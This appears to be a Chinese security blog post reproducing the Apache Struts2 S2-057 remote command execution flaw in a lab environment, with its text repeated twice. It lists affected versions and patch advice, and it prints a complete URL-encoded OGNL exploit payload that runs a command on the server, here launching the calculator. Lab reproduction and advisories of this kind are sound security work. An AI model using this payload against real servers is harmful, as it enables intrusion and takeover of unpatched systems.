网站安全加固之apache环境S2-057漏洞 利用POC 远程执行命令漏洞复现
2018-08-23 19:48
1366 查看
S2-057漏洞,于2018年8月22日被曝出,该Struts2 057漏洞存在远程执行系统的命令,尤其使用linux系统,apache环境,影响范围较大,危害性较高,如果被攻击者利用直接提权到服务器管理员权限,网站数据被篡改,数据库被盗取都会发生。
目前我们SINE安全对该S2-057漏洞的测试,发现受影响的版本是Apache Struts 2.3–ApacheStruts2.3.34、Apache Struts2.5–Apache Struts2.5.16等系列版本。官方Apache已经紧急的对该S2-057漏洞进行了修复。
通过国外曝出来的漏洞poc,我们来介绍下Struts2漏洞该如何的利用:
S2-057漏洞产生于网站配置xml的时候,有一个namespace的值,该值并没有做详细的安全过滤导致可以写入到XML上,尤其url标签值也没有做通配符的过滤,导致可以执行远程代码,以及系统命令到服务器系统中去。
我们首先来搭建下struts2的环境,找一台windows服务器,使用一键部署工具部署好测试环境,vulhub环境也搭建好如下图:
接下来就是Struts2漏洞的利用与复现过程:
访问网站192.168.0.3:7080/struts2/${(sine+sine)}/actionChain.action
将${(sine+sine)}里的内容换成exp,EXP内容如下:
%24%7b(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27calc%27).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew++java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b51020%5d%2c%23c.read(%23d)%2c%23jas502n%3d+%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23jas502n.println(%23d+)%2c%23jas502n.close())%7d/actionChain.action
复制exp内容到浏览器执行,发现服务器会直接运行计算器如下图:
S2-057漏洞修复建议:
升级到Apache Struts最新版本2.3.35或者是Apache Struts最新版本2.5.17,直接升级即可官方已经做好漏洞补丁,完全兼容。
目前我们SINE安全对该S2-057漏洞的测试,发现受影响的版本是Apache Struts 2.3–ApacheStruts2.3.34、Apache Struts2.5–Apache Struts2.5.16等系列版本。官方Apache已经紧急的对该S2-057漏洞进行了修复。
通过国外曝出来的漏洞poc,我们来介绍下Struts2漏洞该如何的利用:
S2-057漏洞产生于网站配置xml的时候,有一个namespace的值,该值并没有做详细的安全过滤导致可以写入到XML上,尤其url标签值也没有做通配符的过滤,导致可以执行远程代码,以及系统命令到服务器系统中去。
我们首先来搭建下struts2的环境,找一台windows服务器,使用一键部署工具部署好测试环境,vulhub环境也搭建好如下图:
接下来就是Struts2漏洞的利用与复现过程:
访问网站192.168.0.3:7080/struts2/${(sine+sine)}/actionChain.action
将${(sine+sine)}里的内容换成exp,EXP内容如下:
%24%7b(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27calc%27).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew++java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b51020%5d%2c%23c.read(%23d)%2c%23jas502n%3d+%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23jas502n.println(%23d+)%2c%23jas502n.close())%7d/actionChain.action
复制exp内容到浏览器执行,发现服务器会直接运行计算器如下图:
S2-057漏洞修复建议:
升级到Apache Struts最新版本2.3.35或者是Apache Struts最新版本2.5.17,直接升级即可官方已经做好漏洞补丁,完全兼容。
相关文章推荐
- 9.漏洞验证系列--Apache Struts2 远程命令执行(S2-045)
- Apache Struts2 多个前缀参数远程命令执行漏洞及测试方法
- 【更新WordPress 4.6漏洞利用PoC】PHPMailer曝远程代码执行高危漏洞(CVE-2016-10033)
- Apache Struts2 远程命令执行漏洞
- 方程式漏洞之复现window2008/win7 远程命令执行漏洞
- 【高危漏洞预警】CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052)
- Struts 2 S2-045 Jakarta插件远程代码执行漏洞加固方法
- 【漏洞公告】CVE-2017-9791:Struts(S2-048)远程命令执行漏洞
- 利用最新struts2远程执行命令漏洞渗透网站的演示
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- tomcat 远程命令执行漏洞复现
- 复现IIS6.0远程命令执行漏洞
- Struts2再爆远程命令执行漏洞!Struts2-048 Poc Shell及防御修复方案抢先看!
- Struts2 REST 插件 XStream 远程代码执行漏洞 S2-052 复现过程
- Apache shiro 1.2.4版本远程命令执行漏洞详解
- 【S2-052】Struts2远程命令执行漏洞(CVE-2017-9805)
- CVE-2017-8464远程命令执行漏洞复现
- PKAV 发现 Struts2 最新远程命令执行漏洞(S2-037)
- struts2远程命令执行漏洞S2-045
- Apache Struts 2 S2-045 高危漏洞利用工具poc+Exp